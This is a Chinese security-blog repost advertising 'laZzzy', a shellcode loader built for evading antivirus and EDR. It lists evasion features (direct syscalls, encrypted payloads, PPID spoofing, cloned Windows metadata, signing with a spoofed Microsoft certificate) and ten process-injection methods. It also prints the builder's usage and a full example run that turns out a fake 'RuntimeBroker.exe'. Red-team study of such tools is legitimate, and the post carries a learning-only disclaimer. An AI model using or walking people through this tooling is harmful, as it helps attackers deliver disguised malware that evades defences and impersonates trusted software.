laZzzy - shellcode 加载器
2022-12-28 10:3:4 Author: 黑白之道(查看原文) 阅读量:18 收藏

特征

  • 直接系统调用和本机 ( Nt*) 函数(不是所有函数,但大多数)

  • 导入地址表 (IAT) 规避

  • 加密有效负载(XOR 和 AES)

    • 随机生成的密钥

    • \x90使用 NOPS ( )自动填充有效负载(如有必要)

    • 有效负载的逐字节内存解密

  • XOR 加密字符串

  • PPID欺骗

  • 阻止非 Microsoft 签名的 DLL

  • (可选)克隆PE图标和属性

  • (可选)使用欺骗性证书进行代码签名

带有 Visual Studio 和以下组件的 Windows 机器,可以从Visual Studio Installer>Individual Components安装:

  • C++ Clang Compiler for WindowsandC++ Clang-cl for build tools

ClickOnce Publishing

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
usage: builder.py [-h] -s  -p  -m  [-tp] [-sp] [-pp] [-b] [-d]
options:  -h, --help  show this help message and exit  -s          path to raw shellcode  -p          password  -m          shellcode execution method (e.g. 1)  -tp         process to inject (e.g. svchost.exe)  -sp         process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)  -pp         parent process to spoof (e.g. explorer.exe)  -b          binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)  -d          domain to spoof (e.g. www.microsoft.com)
shellcode execution method:   1          Early-bird APC Queue (requires sacrificial proces)   2          Thread Hijacking (requires sacrificial proces)   3          KernelCallbackTable (requires sacrificial process that has GUI)   4          Section View Mapping   5          Thread Suspension   6          LineDDA Callback   7          EnumSystemGeoID Callback   8          FLS Callback   9          SetTimer   10         Clipboard

例子:

执行builder.py并提供必要的数据

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
[+] XOR-encrypting payload with        [*] Key:                        d3b666606468293dfa21ce2ff25e86f6
[+] AES-encrypting payload with        [*] IV:                         f96312f17a1a9919c74b633c5f861fe5        [*] Key:                        6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec
[+] Modifying template using        [*] Technique:                  Early-bird APC Queue        [*] Process to inject:          None        [*] Process to spawn:           C:\\Windows\\System32\\RuntimeBroker.exe        [*] Parent process to spoof:    svchost.exe
[+] Spoofing metadata        [*] Binary:                     C:\\Windows\\System32\\RuntimeBroker.exe        [*] CompanyName:                Microsoft Corporation        [*] FileDescription:            Runtime Broker        [*] FileVersion:                10.0.22621.608 (WinBuild.160101.0800)        [*] InternalName:               RuntimeBroker.exe        [*] LegalCopyright:             © Microsoft Corporation. All rights reserved.        [*] OriginalFilename:           RuntimeBroker.exe        [*] ProductName:                Microsoft® Windows® Operating System        [*] ProductVersion:             10.0.22621.608
[+] Compiling project        [*] Compiled executable:        C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe
[+] Signing binary with spoofed cert        [*] Domain:                     www.microsoft.com        [*] Version:                    2        [*] Serial:                     33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6        [*] Subject:                    /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com        [*] Issuer:                     /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06        [*] Not Before:                 October 04 2022        [*] Not After:                  September 29 2023        [*] PFX file:                   C:\MalDev\laZzzy\output\www.microsoft.com.pfx
[+] All done!        [*] Output file:                C:\MalDev\laZzzy\output\RuntimeBroker.exe

Shellcode 执行技术

  1. Early-bird APC Queue (需要牺牲过程)

  2. 线程劫持(需要牺牲进程)

  3. KernelCallbackTable (需要具有 GUI 的牺牲进程)

  4. 截面视图映射

  5. 线程暂停

  6. LineDDA回调

  7. EnumSystemGeoID 回调

  8. 光纤本地存储 (FLS) 回调

  9. 设置定时器

  10. 剪贴板

https://github.com/capt-meelo/laZzzy

文章来源:Khan安全攻防实验室

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650559921&idx=5&sn=d7aee9c1ce472489dd85aee45feb6358&chksm=83bd3055b4cab9438e725e795f05ceac8a629d49791e5691f6320d1e9ea3ffbc61ed5b9b8053#rd
如有侵权请联系:admin#unsafe.sh